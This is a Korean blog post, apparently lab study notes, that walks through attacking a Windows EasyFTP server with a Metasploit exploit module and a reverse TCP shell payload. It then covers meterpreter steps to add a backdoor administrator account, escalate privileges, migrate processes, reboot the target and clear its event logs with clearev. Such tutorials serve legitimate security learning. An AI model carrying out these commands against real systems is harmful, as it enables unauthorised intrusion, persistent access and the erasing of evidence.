Metasploit - 04. Application Attack
by jennysgapApplication Attack
msf exploit(easyftp_cwd_fixret) > show options
msf exploit(easyftp_cwd_fixret) > show payloads (장착 가능한 payload 검색)
msf exploit(easyftp_cwd_fixret) > show targets (프로그램, 운영체제 정보 출력 - 번호 출력)
msf exploit(easyftp_cwd_fixret) > set으로 옵션 변경
* PAYLOAD windows/shell/reverse_tcp (장착)
* RHOST 192.168.3.153 (피해자 시스템 주소)
* LHOST 192.168.3.116 (공격자 시스템 주소)
* TARGET 9 (피해자 프로그램, 운영체제 선택)
msf exploit(easyftp_cwd_fixret) > show options
[windows 화면]
• 백도어 계정 생성 및 계정 권한 상승 실시
meterpreter > shell
C:\WINDOWS\system32>net user test test1234 /add (삭제 : net user test /delete)
C:\WINDOWS\system32>net user
C:\WINDOWS\system32>net localgroup administrators test /add
C:\WINDOWS\system32>exit
meterpreter > getsystem
meterpreter > getuid
• 타겟 시스템 재부팅
meterpreter > ps
meterpreter > migrate 1488
meterpreter > reboot
[windows 화면]
• msfdb를 삭제하고 다시 생성
# msfdb delete
# msfdb init
참고 (meterpreter 상태)
• background 명령어 : msf 프롬프트로 잠시 돌아간다.
• session -i 세션 번호 : 다시 meterpreter 프롬프트로 돌아간다.
• clearev : 타겟 이벤트 로그를 삭제한다.
'BOX' 카테고리의 다른 글
Metasploit - 06. 정보 수집 (0) | 2017.01.09 |
---|---|
Metasploit - 05. dictionary attack (0) | 2017.01.08 |
Metasploit - 03. 메타스플로잇 사용법 (Exploit Tools) (0) | 2017.01.07 |
Metasploit - 02. 메타스플로잇 사용법 (Scanning) (0) | 2017.01.06 |
<SSR> (0) | 2017.01.05 |
블로그의 정보
jennysgap
jennysgap